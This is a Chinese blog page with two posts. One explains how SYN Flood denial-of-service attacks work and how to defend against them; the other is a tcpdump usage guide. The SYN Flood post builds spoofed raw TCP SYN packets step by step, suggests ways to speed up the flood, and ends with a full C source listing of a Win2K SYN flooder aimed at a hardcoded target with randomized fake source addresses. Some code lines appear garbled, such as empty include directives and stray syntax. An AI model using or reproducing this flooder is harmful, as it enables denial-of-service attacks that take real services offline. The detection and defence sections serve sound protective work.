IT博客-forrest-文章分类-NET

SYN Flood攻击的基本原理及防御

forrest — Tue, 13 Feb 2007 07:05:00 GMT

第一部分 SYN Flood的基本原理

SYN Flood是当前最流行的DoS（拒绝服务攻击）与DDoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽（CPU满负荷或内存不足）的攻击方式。

要明白这种攻击的基本原理，还是要从TCP连接建立的过程开始说起：

大家都知道，TCP与UDP不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送TCP数据，必须先建立一个虚拟电路，也就是TCP连接，建立TCP连接的标准过程是这样的：

首先，请求端（客户端）发送一个包含SYN标志的TCP报文，SYN即同步（Synchronize），同步报文会指明客户端使用的端口以及TCP连接的初始序号；

第二步，服务器在收到客户端的SYN报文后，将返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加一，ACK即确认（Acknowledgement）。

第三步，客户端也返回一个确认报文ACK给服务器端，同样TCP序列号被加一，到此一个TCP连接完成。

以上的连接过程在TCP协议中被称为三次握手（Three-way Handshake）。

问题就出在TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送SYN+ACK给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级（大约为30秒-2分钟）；一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接，即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求（毕竟客户端的正常请求比率非常之小），此时从正常客户的角度看来，服务器失去响应，这种情况我们称作：服务器端受到了SYN Flood攻击（SYN洪水攻击）。

从防御角度来说，有几种简单的解决方法，第一种是缩短SYN Timeout时间，由于SYN Flood攻击的效果取决于服务器上保持的SYN半连接数，这个值=SYN攻击的频度 x SYN Timeout，所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间，例如设置为20秒以下（过低的SYN Timeout设置可能会影响客户的正常访问），可以成倍的降低服务器的负荷。

第二种方法是设置SYN Cookie，就是给每一个请求连接的IP地址分配一个Cookie，如果短时间内连续受到某个IP的重复SYN报文，就认定是受到了攻击，以后从这个IP地址来的包会被一概丢弃。

可是上述的两种方法只能对付比较原始的SYN Flood攻击，缩短SYN Timeout时间仅在对方攻击频度不高的情况下生效，SYN Cookie更依赖于对方使用真实的IP地址，如果攻击者以数万/秒的速度发送SYN报文，同时利用SOCK_RAW随机改写IP报文中的源地址，以上的方法将毫无用武之地。

第二部份 SYN Flooder源码解读

下面我们来分析SYN Flooder的程序实现。

首先，我们来看一下TCP报文的格式：

0 1 2 3 4 5 6

0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| ＩＰ首部 | ＴＣＰ首部 | ＴＣＰ数据段　　 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

图一 TCP报文结构

如上图所示，一个TCP报文由三个部分构成：20字节的IP首部、20字节的TCP首部与不定长的数据段，（实际操作时可能会有可选的IP选项，这种情况下TCP首部向后顺延）由于我们只是发送一个SYN信号，并不传递任何数据，所以TCP数据段为空。TCP首部的数据结构为：

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 十六位源端口号 | 十六位目标端口号 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 三十二位序列号 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 三十二位确认号 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 四位 | |U|A|P|R|S|F| |

| 首部 |六位保留位 |R|C|S|S|Y|I| 十六位窗口大小 |

| 长度 | |G|K|H|T|N|N| |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 十六位校验和 | 十六位紧急指针 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 选项（若有） |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 数据（若有） |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

图二 TCP首部结构

根据TCP报文格式，我们定义一个结构TCP_HEADER用来存放TCP首部：

typedef struct _tcphdr

{

USHORT th_sport; //16位源端口

USHORT th_dport; //16位目的端口

unsigned int th_seq; //32位序列号

unsigned int th_ack; //32位确认号

unsigned char th_lenres; //4位首部长度+6位保留字中的4位

unsigned char th_flag; //2位保留字+6位标志位

USHORT th_win; //16位窗口大小

USHORT th_sum; //16位校验和

USHORT th_urp; //16位紧急数据偏移量

}TCP_HEADER;

通过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2（二进制的00000010）我们能制造一个SYN的TCP报文，通过大量发送这个报文可以实现SYN Flood的效果。但是为了进行IP欺骗从而隐藏自己，也为了躲避服务器的SYN Cookie检查，还需要直接对IP首部进行操作：

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 版本 | 长度 | 八位服务类型 | 十六位总长度 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 十六位标识 | 标志| 十三位片偏移　　 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 八位生存时间 | 八位协议 | 十六位首部校验和 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 三十二位源ＩＰ地址　　|

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 三十二位目的ＩＰ地址 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 选项（若有） |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| 　　数据　　 |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

图三 IP首部结构

同样定义一个IP_HEADER来存放IP首部

typedef struct _iphdr

{

unsigned char h_verlen; //4位首部长度+4位IP版本号

unsigned char tos; //8位服务类型TOS

unsigned short total_len; //16位总长度（字节）

unsigned short ident; //16位标识

unsigned short frag_and_flags; //3位标志位

unsigned char ttl; //8位生存时间 TTL

unsigned char proto; //8位协议号(TCP, UDP 或其他)

unsigned short checksum; //16位IP首部校验和

unsigned int sourceIP; //32位源IP地址

unsigned int destIP; //32位目的IP地址

}IP_HEADER;

然后通过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));

建立一个原始套接口，由于我们的IP源地址是伪造的，所以不能指望系统帮我们计算IP校验和，我们得在在setsockopt中设置IP_HDRINCL告诉系统自己填充IP首部并自己计算校验和：

flag=TRUE;

setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));

IP校验和的计算方法是：首先将IP首部的校验和字段设为0（IP_HEADER.checksum=0）,然后计算整个IP首部（包括选项）的二进制反码的和，一个标准的校验和函数如下所示：

USHORT checksum(USHORT *buffer, int size)

{

unsigned long cksum=0;

while(size >1) {

cksum+=*buffer++;

size -=sizeof(USHORT);

}

if(size ) cksum += *(UCHAR*)buffer;

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum += (cksum >>16);

return (USHORT)(~cksum);

}

这个函数并没有经过任何的优化，由于校验和函数是TCP/IP协议中被调用最多函数之一，所以一般说来，在实现TCP/IP栈时，会根据操作系统对校验和函数进行优化。

TCP首部检验和与IP首部校验和的计算方法相同，在程序中使用同一个函数来计算。

需要注意的是，由于TCP首部中不包含源地址与目标地址等信息，为了保证TCP校验的有效性，在进行TCP校验和的计算时，需要增加一个TCP伪首部的校验和，定义如下：

struct

{

unsigned long saddr; //源地址

unsigned long daddr; //目的地址

char mbz; //置空

char ptcl; //协议类型

unsigned short tcpl; //TCP长度

}psd_header;

然后我们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和：

memcpy(SendBuf,&psd_header,sizeof(psd_header));

memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));

tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

计算IP校验和的时候不需要包括TCP伪首部：

memcpy(SendBuf,&ip_header,sizeof(ip_header));

memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));

ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_header));

再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就可以直接发送了：

memcpy(SendBuf,&ip_header,sizeof(ip_header));

sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr));

因为整个TCP报文中的所有部分都是我们自己写入的（操作系统不会做任何干涉），所以我们可以在IP首部中放置随机的源IP地址，如果伪造的源IP地址确实有人使用，他在接收到服务器的SYN+ACK报文后会发送一个RST报文（标志位为00000100），通知服务器端不需要等待一个无效的连接，可是如果这个伪造IP并没有绑定在任何的主机上，不会有任何设备去通知主机该连接是无效的（这正是TCP协议的缺陷），主机将不断重试直到SYN Timeout时间后才能丢弃这个无效的半连接。所以当攻击者使用主机分布很稀疏的IP地址段进行伪装IP的SYN Flood攻击时，服务器主机承受的负荷会相当的高，根据测试，一台PIII 550MHz+128MB+100Mbps的机器使用经过初步优化的SYN Flooder程序可以以16,000包/秒的速度发送TCP SYN报文，这样的攻击力已经足以拖垮大部分WEB服务器了。

稍微动动脑筋我们就会发现，想对SYN Flooder程序进行优化是很简单的，从程序构架来看，攻击时循环内的代码主要是进行校验和计算与缓冲区的填充，一般的思路是提高校验和计算的速度，我甚至见过用汇编代码编写的校验和函数，实际上，有另外一个变通的方法可以轻松实现优化而又不需要高深的编程技巧和数学知识，（老实说吧，我数学比较差:P），我们仔细研究了两个不同源地址的TCP SYN报文后发现，两个报文的大部分字段相同（比如目的地址、协议等等），只有源地址和校验和不同（如果为了隐蔽，源端口也可以有变化，但是并不影响我们算法优化的思路），如果我们事先计算好大量的源地址与校验和的对应关系表（如果其他的字段有变化也可以加入这个表），等计算完毕了攻击程序就只需要单纯的组合缓冲区并发送（用指针来直接操作缓冲区的特定位置，从事先计算好的对应关系表中读出数据，替换缓冲区相应字段），这种简单的工作完全取决于系统发送IP包的速度，与程序的效率没有任何关系，这样，即使是CPU主频较低的主机也能快速的发送大量TCP SYN攻击包。如果考虑到缓冲区拼接的时间，甚至可以定义一个很大的缓冲区数组，填充完毕后再发送（雏鹰给这种方法想了一个很贴切的比喻：火箭炮装弹虽然很慢，但是一旦炮弹上膛了以后就可以连续猛烈地发射了:）。

第三部分 SYN Flood攻击的监测与防御初探

对于SYN Flood攻击，目前尚没有很好的监测和防御方法，不过如果系统管理员熟悉攻击方法和系统架构，通过一系列的设定，也能从一定程度上降低被攻击系统的负荷，减轻负面的影响。（这正是我撰写本文的主要目的）

一般来说，如果一个系统（或主机）负荷突然升高甚至失去响应，使用Netstat 命令能看到大量SYN_RCVD的半连接（数量>500或占总连接数的10%以上），可以认定，这个系统（或主机）遭到了SYN Flood攻击。

遭到SYN Flood攻击后，首先要做的是取证，通过Netstat –n –p tcp >resault.txt记录目前所有TCP连接状态是必要的，如果有嗅探器，或者TcpDump之类的工具，记录TCP SYN报文的所有细节也有助于以后追查和防御，需要记录的字段有：源地址、IP首部中的标识、TCP首部中的序列号、TTL值等，这些信息虽然很可能是攻击者伪造的，但是用来分析攻击者的心理状态和攻击程序也不无帮助。特别是TTL值，如果大量的攻击包似乎来自不同的IP但是TTL值却相同，我们往往能推断出攻击者与我们之间的路由器距离，至少也可以通过过滤特定TTL值的报文降低被攻击系统的负荷（在这种情况下TTL值与攻击报文不同的用户就可以恢复正常访问）

前面曾经提到可以通过缩短SYN Timeout时间和设置SYN Cookie来进行SYN攻击保护，对于Win2000系统，还可以通过修改注册表降低SYN Flood的危害，在注册表中作如下改动：

首先，打开regedit，找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters

增加一个SynAttackProtect的键值，类型为REG_DWORD，取值范围是0-2，这个值决定了系统受到SYN攻击时采取的保护措施，包括减少系统SYN+ACK的重试的次数等，默认值是0（没有任何保护措施），推荐设置是2；

增加一个TcpMaxHalfOpen的键值，类型为REG_DWORD，取值范围是100-0xFFFF，这个值是系统允许同时打开的半连接，默认情况下WIN2K PRO和SERVER是100，ADVANCED SERVER是500，这个值很难确定，取决于服务器TCP负荷的状况和可能受到的攻击强度，具体的值需要经过试验才能决定。

增加一个TcpMaxHalfOpenRetried的键值，类型为REG_DWORD，取值范围是80-0xFFFF，默认情况下WIN2K PRO和SERVER是80，ADVANCED SERVER是400，这个值决定了在什么情况下系统会打开SYN攻击保护。

我们来分析一下Win2000的SYN攻击保护机制：正常情况下，Win2K对TCP连接的三次握手有一个常规的设置，包括SYN Timeout时间、SYN-ACK的重试次数和SYN报文从路由器到系统再到Winsock的延时等，这个常规设置是针对系统性能进行优化的（安全和性能往往相互矛盾）所以可以给用户提供方便快捷的服务；一旦服务器受到攻击，SYN半连接的数量超过TcpMaxHalfOpenRetried的设置，系统会认为自己受到了SYN Flood攻击，此时设置在SynAttackProtect键值中的选项开始作用，SYN Timeout时间被减短，SYN-ACK的重试次数减少，系统也会自动对缓冲区中的报文进行延时，避免对TCP/IP堆栈造成过大的冲击，力图将攻击危害减到最低；如果攻击强度不断增大，超过了TcpMaxHalfOpen值，此时系统已经不能提供正常的服务了，更重要的是保证系统不会崩溃，所以系统将会丢弃任何超出TcpMaxHalfOpen值范围的SYN报文（应该是使用随机丢包策略），保证系统的稳定性。

所以，对于需要进行SYN攻击保护的系统，我们可以测试/预测一下访问峰值时期的半连接打开量，以其作为参考设定TcpMaxHalfOpenRetried的值（保留一定的余量），然后再以TcpMaxHalfOpenRetried的1.25倍作为TcpMaxHalfOpen值，这样可以最大限度地发挥WIN2K自身的SYN攻击保护机制。

通过设置注册表防御SYN Flood攻击，采用的是“挨打”的策略，无论系统如何强大，始终不能光靠挨打支撑下去，除了挨打之外，“退让”也是一种比较有效的方法。

退让策略是基于SYN Flood攻击代码的一个缺陷，我们重新来分析一下SYN Flood攻击者的流程：SYN Flood程序有两种攻击方式，基于IP的和基于域名的，前者是攻击者自己进行域名解析并将IP地址传递给攻击程序，后者是攻击程序自动进行域名解析，但是它们有一点是相同的，就是一旦攻击开始，将不会再进行域名解析，我们的切入点正是这里：假设一台服务器在受到SYN Flood攻击后迅速更换自己的IP地址，那么攻击者仍在不断攻击的只是一个空的IP地址，并没有任何主机，而防御方只要将DNS解析更改到新的IP地址就能在很短的时间内（取决于DNS的刷新时间）恢复用户通过域名进行的正常访问。为了迷惑攻击者，我们甚至可以放置一台“牺牲”服务器让攻击者满足于攻击的“效果”（由于DNS缓冲的原因，只要攻击者的浏览器不重起，他访问的仍然是原先的IP地址）。

同样的原因，在众多的负载均衡架构中，基于DNS解析的负载均衡本身就拥有对SYN Flood的免疫力，基于DNS解析的负载均衡能将用户的请求分配到不同IP的服务器主机上，攻击者攻击的永远只是其中一台服务器，虽然说攻击者也能不断去进行DNS请求从而打破这种“退让”策略，但是一来这样增加了攻击者的成本，二来过多的DNS请求可以帮助我们追查攻击者的真正踪迹（DNS请求不同于SYN攻击，是需要返回数据的，所以很难进行IP伪装）。

对于防火墙来说，防御SYN Flood攻击的方法取决于防火墙工作的基本原理，一般说来，防火墙可以工作在TCP层之上或IP层之下，工作在TCP层之上的防火墙称为网关型防火墙，网关型防火墙与服务器、客户机之间的关系如下图所示：

外部TCP连接内部TCP连接

[客户机] =================>[防火墙] =================>[服务器]

如上图所示，客户机与服务器之间并没有真正的TCP连接，客户机与服务器之间的所有数据交换都是通过防火墙代理的，外部的DNS解析也同样指向防火墙，所以如果网站被攻击，真正受到攻击的是防火墙，这种防火墙的优点是稳定性好，抗打击能力强，但是因为所有的TCP报文都需要经过防火墙转发，所以效率比较低由于客户机并不直接与服务器建立连接，在TCP连接没有完成时防火墙不会去向后台的服务器建立新的TCP连接，所以攻击者无法越过防火墙直接攻击后台服务器，只要防火墙本身做的足够强壮，这种架构可以抵抗相当强度的SYN Flood攻击。但是由于防火墙实际建立的TCP连接数为用户连接数的两倍（防火墙两端都需要建立TCP连接），同时又代理了所有的来自客户端的TCP请求和数据传送，在系统访问量较大时，防火墙自身的负荷会比较高，所以这种架构并不能适用于大型网站。（我感觉，对于这样的防火墙架构，使用TCP_STATE攻击估计会相当有效:）

工作在IP层或IP层之下的防火墙（路由型防火墙）工作原理有所不同，它与服务器、客户机的关系如下图所示：

[防火墙] 数据包修改转发

[客户机]========|=======================>[服务器]

TCP连接

客户机直接与服务器进行TCP连接，防火墙起的是路由器的作用，它截获所有通过的包并进行过滤，通过过滤的包被转发给服务器，外部的DNS解析也直接指向服务器，这种防火墙的优点是效率高，可以适应100Mbps-1Gbps的流量，但是这种防火墙如果配置不当，不仅可以让攻击者越过防火墙直接攻击内部服务器，甚至有可能放大攻击的强度，导致整个系统崩溃。

在这两种基本模型之外，有一种新的防火墙模型，我个人认为还是比较巧妙的，它集中了两种防火墙的优势，这种防火墙的工作原理如下所示：

第一阶段，客户机请求与防火墙建立连接：

SYN SYN+ACK ACK

[客户机]---- >[防火墙] => [防火墙]-------- >[客户机] => [客户机]--- >[防火墙]

第二阶段，防火墙伪装成客户机与后台的服务器建立连接

[防火墙]< =========== >[服务器]

TCP连接

第三阶段，之后所有从客户机来的TCP报文防火墙都直接转发给后台的服务器

防火墙转发

[客户机]< ======|======= >[服务器]

TCP连接

这种结构吸取了上两种防火墙的优点，既能完全控制所有的SYN报文，又不需要对所有的TCP数据报文进行代理，是一种两全其美的方法。

近来，国外和国内的一些防火墙厂商开始研究带宽控制技术，如果能真正做到严格控制、分配带宽，就能很大程度上防御绝大多数的拒绝服务攻击，我们还是拭目以待吧。

附录：Win2000下的SYN Flood程序

改编自Linux下Zakath编写的SYN Flooder

编译环境：VC++6.0,编译时需要包含ws2_32.lib

//////////////////////////////////////////////////////////////////////////

// //

// SYN Flooder For Win2K by Shotgun //

// //

// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath //

// THANX Lion Hook FOR PROGRAM OPTIMIZATION //

// //

// Released: [2001.4] //

// Author: [Shotgun] //

// Homepage: //

// http://IT.Xici.Net] //

// http://WWW.Patching.Net] //

// //

//////////////////////////////////////////////////////////////////////////

#include

#include

#include

#include

#define SEQ 0x28376839

#define SYN_DEST_IP "192.168.15.250"//被攻击的IP

#define FAKE_IP "10.168.150.1" //伪装IP的起始值，本程序的伪装IP覆盖一个B类网段

#define STATUS_FAILED 0xFFFF //错误返回值

typedef struct _iphdr //定义IP首部

{

unsigned char h_verlen; //4位首部长度,4位IP版本号

unsigned char tos; //8位服务类型TOS

unsigned short total_len; //16位总长度（字节）

unsigned short ident; //16位标识

unsigned short frag_and_flags; //3位标志位

unsigned char ttl; //8位生存时间 TTL

unsigned char proto; //8位协议 (TCP, UDP 或其他)

unsigned short checksum; //16位IP首部校验和

unsigned int sourceIP; //32位源IP地址

unsigned int destIP; //32位目的IP地址

}IP_HEADER;

struct //定义TCP伪首部

{

unsigned long saddr; //源地址

unsigned long daddr; //目的地址

char mbz;

char ptcl; //协议类型

unsigned short tcpl; //TCP长度

}psd_header;

typedef struct _tcphdr //定义TCP首部

{

USHORT th_sport; //16位源端口

USHORT th_dport; //16位目的端口

unsigned int th_seq; //32位序列号

unsigned int th_ack; //32位确认号

unsigned char th_lenres; //4位首部长度/6位保留字

unsigned char th_flag; //6位标志位

USHORT th_win; //16位窗口大小

USHORT th_sum; //16位校验和

USHORT th_urp; //16位紧急数据偏移量

}TCP_HEADER;

//CheckSum:计算校验和的子函数

USHORT checksum(USHORT *buffer, int size)

{

unsigned long cksum=0;

while(size >1) {

cksum+=*buffer++;

size -=sizeof(USHORT);

}

if(size ) {

cksum += *(UCHAR*)buffer;

}

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum += (cksum >>16);

return (USHORT)(~cksum);

}

// SynFlood主函数

int main()

{

int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;

int TimeOut=2000,SendSEQ=0;

char SendBuf[128]={0};

char RecvBuf[65535]={0};

WSADATA wsaData;

SOCKET SockRaw=(SOCKET)NULL;

struct sockaddr_in DestAddr;

IP_HEADER ip_header;

TCP_HEADER tcp_header;

//初始化SOCK_RAW

if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){

fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode);

ExitProcess(STATUS_FAILED);

}

SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));

if (SockRaw==INVALID_SOCKET){

fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError());

ExitProcess(STATUS_FAILED);

}

flag=TRUE;

//设置IP_HDRINCL以自己填充IP首部

ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));

If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n");

__try{

//设置发送超时

ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));

if(ErrorCode==SOCKET_ERROR){

fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError());

__leave;

}

memset(&DestAddr,0,sizeof(DestAddr));

DestAddr.sin_family=AF_INET;

DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);

FakeIpNet=inet_addr(FAKE_IP);

FakeIpHost=ntohl(FakeIpNet);

//填充IP首部

ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));

//高四位IP版本号，低四位首部长度

ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度（字节）

ip_header.ident=1; //16位标识

ip_header.frag_and_flags=0; //3位标志位

ip_header.ttl=128; //8位生存时间TTL

ip_header.proto=IPPROTO_TCP; //8位协议(TCP,UDP…)

ip_header.checksum=0; //16位IP首部校验和

ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32位源IP地址

ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址

//填充TCP首部

tcp_header.th_sport=htons(7000); //源端口号

tcp_header.th_dport=htons(8080); //目的端口号

tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号

tcp_header.th_ack=0; //ACK序列号置为0

tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位

tcp_header.th_flag=2; //SYN 标志

tcp_header.th_win=htons(16384); //窗口大小

tcp_header.th_urp=0; //偏移

tcp_header.th_sum=0; //校验和

//填充TCP伪首部（用于计算校验和，并不真正发送）

psd_header.saddr=ip_header.sourceIP; //源地址

psd_header.daddr=ip_header.destIP; //目的地址

psd_header.mbz=0;

psd_header.ptcl=IPPROTO_TCP; //协议类型

psd_header.tcpl=htons(sizeof(tcp_header)); //TCP首部长度

while(1) {

//每发送10,240个报文输出一个标示符

printf(".");

for(counter=0;counter<10240;counter++){

if(SendSEQ++==65536) SendSEQ=1; //序列号循环

//更改IP首部

ip_header.checksum=0; //16位IP首部校验和

ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32位源IP地址

//更改TCP首部

tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号

tcp_header.th_sum=0; //校验和

//更改TCP Pseudo Header

psd_header.saddr=ip_header.sourceIP;

//计算TCP校验和，计算校验和时需要包括TCP pseudo header

memcpy(SendBuf,&psd_header,sizeof(psd_header));

memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));

tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

//计算IP校验和

memcpy(SendBuf,&ip_header,sizeof(ip_header));

memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));

memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);

datasize=sizeof(ip_header)+sizeof(tcp_header);

ip_header.checksum=checksum((USHORT *)SendBuf,datasize);

//填充发送缓冲区

memcpy(SendBuf,&ip_header,sizeof(ip_header));

//发送TCP报文

ErrorCode=sendto(SockRaw,

SendBuf,

datasize,

0,

(struct sockaddr*) &DestAddr,

sizeof(DestAddr));

if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError());

}//End of for

}//End of While

}//End of try

__finally {

if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);

WSACleanup();

}

return 0;

}

forrest 2007-02-13 15:05 发表评论

详细Tcpdump 的用法

forrest — Wed, 27 Dec 2006 06:43:00 GMT

详细Tcpdump 的用法

第一种是关于类型的关键字，主要包括host，net，port, 例如 host 210.27.48.2，指明 210.27.48.2是一台主机，net 202.0.0.0 指明 202.0.0.0是一个网络地址，port 23 指明端口号是23。如果没有指定类型，缺省的类型是host.

第二种是确定传输方向的关键字，主要包括src , dst ,dst or src, dst and src ,这些关键字指明了传输的方向。举例说明，src 210.27.48.2 ,指明ip包中源地址是210.27.48.2 , dst net 202.0.0.0 指明目的网络地址是202.0.0.0 。如果没有指明方向关键字，则缺省是src or dst关键字。

第三种是协议的关键字，主要包括fddi,ip,arp,rarp,tcp,udp等类型。Fddi指明是在FDDI(分布式光纤数据接口网络)上的特定的网络协议，实际上它是"ether"的别名，fddi和ether具有类似的源地址和目的地址，所以可以将fddi协议包当作ether的包进行处理和分析。其他的几个关键字就是指明了监听的包的协议内容。如果没有指定任何协议，则tcpdump将会监听所有协议的信息包。
除了这三种类型的关键字之外，其他重要的关键字如下：gateway, broadcast,less,greater,还有三种逻辑运算，取非运算是 'not ' '! ', 与运算是'and','&&';或运算是'or' ,'││'；这些关键字可以组合起来构成强大的组合条件来满足人们的需要，下面举几个例子来说明。
普通情况下，直接启动tcpdump将监视第一个网络界面上所有流过的数据包。
# tcpdump
tcpdump: listening on fxp0
11:58:47.873028 202.102.245.40.netbios-ns > 202.102.245.127.netbios-ns: udp 50
11:58:47.974331 0:10:7b:8:3a:56 > 1:80:c2:0:0:0 802.1d ui/C len=43
                     0000 0000 0080 0000 1007 cf08 0900 0000
                     0e80 0000 902b 4695 0980 8701 0014 0002
                     000f 0000 902b 4695 0008 00
11:58:48.373134 0:0:e8:5b:6d:85 > Broadcast sap e0 ui/C len=97
                     ffff 0060 0004 ffff ffff ffff ffff ffff
                     0452 ffff ffff 0000 e85b 6d85 4008 0002
                     0640 4d41 5354 4552 5f57 4542 0000 0000
                     0000 00
使用-i参数指定tcpdump监听的网络界面，这在计算机具有多个网络界面时非常有用，
使用-c参数指定要监听的数据包数量，
使用-w参数指定将监听到的数据包写入文件中保存

A想要截获所有210.27.48.1 的主机收到的和发出的所有的数据包：
#tcpdump host 210.27.48.1

B想要截获主机210.27.48.1 和主机210.27.48.2 或210.27.48.3的通信，使用命令：（在命令行中适用　　　括号时，一定要
#tcpdump host 210.27.48.1 and \ (210.27.48.2 or 210.27.48.3 \)

C如果想要获取主机210.27.48.1除了和主机210.27.48.2之外所有主机通信的ip包，使用命令：
#tcpdump ip host 210.27.48.1 and ! 210.27.48.2

D如果想要获取主机210.27.48.1接收或发出的telnet包，使用如下命令：
#tcpdump tcp port 23 host 210.27.48.1

E 对本机的udp 123 端口进行监视 123 为ntp的服务端口
# tcpdump udp port 123

F 系统将只对名为hostname的主机的通信数据包进行监视。主机名可以是本地主机，也可以是网络上的任何一台计算机。下面的命令可以读取主机hostname发送的所有数据：
#tcpdump -i eth0 src host hostname

G 下面的命令可以监视所有送到主机hostname的数据包：
#tcpdump -i eth0 dst host hostname

H  我们还可以监视通过指定网关的数据包：
#tcpdump -i eth0 gateway Gatewayname

I 如果你还想监视编址到指定端口的TCP或UDP数据包，那么执行以下命令：
#tcpdump -i eth0 host hostname and port 80

J 如果想要获取主机210.27.48.1除了和主机210.27.48.2之外所有主机通信的ip包
，使用命令：
#tcpdump ip host 210.27.48.1 and ! 210.27.48.2

